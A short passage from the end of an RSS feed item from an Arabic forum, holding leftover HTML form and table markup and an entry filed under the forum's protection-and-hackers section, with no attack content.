<input type="text" name="T1" size="25" style="font-size: 12pt; font-family: ms sans serif; border: 1px solid #444; background-color: #FFFDE2" value="المشاهدات غير معروف">&nbsp;&nbsp;&nbsp;&nbsp; 
&nbsp;</td>
		</tr>
	</table>
			</table>
		</fieldset>
	

	</div>
]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>OK</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=24381</guid>
		</item>
	</channel>
</rss>
